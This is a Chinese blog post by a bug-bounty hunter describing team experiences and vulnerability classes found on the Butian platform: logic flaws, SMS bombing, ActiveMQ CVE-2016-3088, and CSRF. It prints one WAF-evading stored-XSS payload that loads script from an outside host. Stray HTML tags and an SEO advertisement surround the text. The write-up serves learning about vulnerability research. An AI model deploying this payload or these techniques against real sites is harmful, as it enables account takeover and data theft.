<legend id="bgo17"><i id="bgo17"></i></legend>

<track id="bgo17"></track>
    <acronym id="bgo17"></acronym>

    <sub id="bgo17"><video id="bgo17"></video></sub>

    <acronym id="bgo17"></acronym>
  • <span id="bgo17"><video id="bgo17"></video></span><track id="bgo17"></track>

    白帽風云錄(你所關心的白帽歷史)

    白帽黑帽 2021-03-15 55 0


    01初衷

    在貳零一七年九月份開始活躍補天平臺,下圖是我九月份提交的第一個漏洞,屬于邏輯類,包括了短信炸彈,越權手機號修改兩個問題,獎勵還是不錯的吧。


    當時的感覺比較開心,因為提交的漏洞不僅通過了而且還獲得了一筆現金獎勵。剛開始在補天挖漏洞期間摸索過注入漏洞、xss漏洞以及通用版本漏洞,但發現的都是一些積分獎勵的廠商,所以選擇挖專屬SRC平臺的原因,一是獎勵高,二是成長比較快。自己在補天挖漏洞的初衷也是閑暇之余得到更多的歷練,很多大佬都是通過自己不斷地實戰走出來的,所以補天給我們提供了一個修煉的平臺。目前補天最新規則中對公益SRC的獎勵也更全面。對于像我這樣進步的新人都有豐富的獎勵,比如年度證書認證。


    02深思

    選擇專屬SRC平臺進行挖掘后,收獲的并不樂觀,專屬SRC平臺經過大佬們的“洗禮”,能剩下來的漏洞也不多,只能尋找挖洞新思路,晚上有時間也會和隊友交流下技術,印象較深刻的比如:

    團隊中的小智小智啦智者楚軒刷漏洞的氣質感染,經常一起在補天刷屏,喜歡收集補天英雄勛章;ch1st除了經常給我們講“足浴風云”外,還喜歡代碼審計和高校漏洞挖掘,一挖一個準,經常半夜組織挖洞;farmsec_xiaosan雖然比較胖,但思想成熟,更是農夫安全團隊的核心成員;whseep和我相見如故,是一位喜歡研究APP端漏洞的高顏值白帽。g97茶涼人稱茶哥“足浴風云”導演級別人物,閱洞無數,高危漏洞隨手拈來。dacainiao吃雞頭號種子選手,善于邏輯漏洞挖掘,重潛白帽。

    其他白帽更多的是低調,大家都會聊聊自己挖洞的生涯以及自己的見解,這種活躍的氛圍也是讓我們彼此進步的一個因素,同時也帶給我對漏洞挖掘的深思:漏洞的形式可以千變萬化,但萬變不離其宗。然后就發現邏輯漏洞屬于一個突破口,雖然有些費時間,但豐厚的現金獎勵和成長值是最大的欣慰。


    03實踐

    十二月補天剛好有一個季度獎活動,我帶著我的這些經驗所得,開始了閑暇之余挖漏洞的歷程,基本上每天都有幾百RMB的收入,說不上很富有,但對一些年輕的白帽來說,這筆財富很有吸引力。首先我選擇的是我所熟悉的行業的平臺,其次再篩選出最近提交漏洞比較少的平臺,避免了重復漏洞。以邏輯漏洞為中心,逐漸擴散到組件漏洞和常見漏洞。

     組件漏洞在信息收集的時候,查看到對應開放的端口的組件的版本是否存在漏洞,組件登錄是否存在弱口令。比如說《ActiveMQ服務漏洞》,使用的低版本存在CVE-2016-3088漏洞,并且還使用了弱口令,容易導致被提權成功,這種漏洞對平臺影響是非常大的。

     常見漏洞這里我歸類為OWASP10漏洞,目前我只遇到XSS漏洞和CSRF漏洞。這里說下我遇到一個比較奇葩的XSS漏洞,這家平臺有WAF防護的比較穩,但WAF和平臺開發者沒有對下面這句XSS語句限制:<sCRiPt/SrC=//xyl.life/rxvM>

    輸入其他的XSS語句都被攔截,然后輸入這個XSS語句就能觸發了儲存型XSS漏洞。而CSRF漏洞我主要通過某些功能中是否有token校驗來判斷,比如說增、刪信息等功能處;如果有token存在,驗證一下是否有效,因為有些開發者設計的token會存在問題,再通過burp構造CSRF攻擊腳本,然后本地驗證漏洞存在即可。

      邏輯漏洞對于業務多的公司,是很容易出現的,很多的防護軟件是檢測不到的。邏輯漏洞我大致分為越權漏洞、設計缺陷、信息遍歷。

    忘記密碼重置漏洞,主要還是平臺開發者在第一層或者第二層的邏輯出現問題,導致能繞過:短信漏洞,主要是分為短信直接轟炸漏洞、短信間隔轟炸漏洞、短信接口批量發送漏洞、短信越權漏洞、短信顯示返回包漏洞:越權購買遇到過低價購買高價手機、低價購買高額保險單、越權投資高額理財收益漏洞。

      總的來說,挖邏輯漏洞需要對網站所有功能都不放過,比如說注冊、登錄、忘記密碼、短信發送、意見反饋、增刪功能等等。使用抓包工具分析,針對能抓取到web網站、APP客戶端以及微信端,分析數據包中的參數是否存在問題,這里需要白帽們耐心的測試和細心的分析,遇到漏洞重復也要有不舍不棄的精神。


    04共鳴

    十二月成長迅速,也獲得了眾測的資格,但其實一個人挖漏洞也挺無聊的,所以就經常去團隊里“炫耀”自己的獎勵和榮譽。每次漏洞得到的獎勵我都截圖發出來,刺激下隊友們,個個對我膜拜啊。比如像智者楚軒這樣,勤奮好學的白帽子:


    之前一直都是批量刷補天漏洞積分的,后來被我挖專屬SRC的炫耀忽悠了,于是私下我們彼此交流緊密。從貳零一七年十二月下旬開始,智者楚軒慢慢的品嘗到了專屬SRC漏洞的“甜味”。


    (附上楚軒漏洞獎勵圖)

    開始我的思路是以邏輯漏洞挖掘為出發點,但驚訝的發現邏輯漏洞竟讓團隊中的一些成員不僅找到了突破口,還打通了自己在漏洞挖掘上面的整體思路??赡芎芏嘈率职酌睂W習的漏洞都是碎片化的,但如果有人指點或者通過自己實戰的感悟,把這些串聯起來,那么挖漏洞稍微輕松些了,此時楚軒的感想:



    進入補天三百名后,就獲得了眾測的資格,里面的現金獎勵也很高的。于是智者楚軒開始了月入上千的生活,此時他的感想:

    對于像智者楚軒這樣的在校白帽子,確實驚艷了我,更加的鼓舞了我們團隊。貳零一八年一月開始,經過我和智者楚軒大佬一起的“炫富”轟炸,團隊成員思維開始轉變,并深刻的認識到:

     

    在我們共同的努力下,團隊進步的也是非???。我們立志在安全圈混出一席之地,這也是我們不斷追逐的目標。在我們進步的同時,補天平臺獎勵規則全面升級,也是對新進的白帽子們最大福利,感謝補天平臺,愿我們一起攜手共勉。感謝我的隊友們,祝愿我們在接下來的日子里乘風破浪,勇往之前!







    聯系方式

    客服QQ: 1483340977 。
    客服電話: 18038047036 。

    如果您想擁有一個網站,如果您想學習SEO

    如果您已有網站但需要診斷,了解快速提升網站排名的方式

    為您制作企業網站瀏覽網站模板 請點擊 密碼:seoszbbq

    或者直接注冊seo.szbbq.cn,若需優惠請添加微信;也可以提供優化服務。感謝您的認可!

    掃一掃添加網站優化為好友

    評論

    好文推薦

    標簽列表